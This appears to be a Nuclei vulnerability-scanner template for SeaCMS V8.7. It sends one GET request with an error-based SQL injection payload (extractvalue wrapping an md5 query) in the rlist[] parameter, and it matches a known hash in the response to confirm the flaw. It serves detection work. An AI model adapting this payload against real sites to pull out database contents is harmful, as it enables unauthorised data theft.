id: seacms-sqli info: name: SeaCMS V8.7 SQL Injection author: ritikchaddha severity: high reference: - https://www.uedbox.com/post/54561/ tags: seacms,sqli requests: - method: GET path: - "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`" redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - "6f7c6dcbc380aac3bcba1f9fccec991e" - type: status status: - 200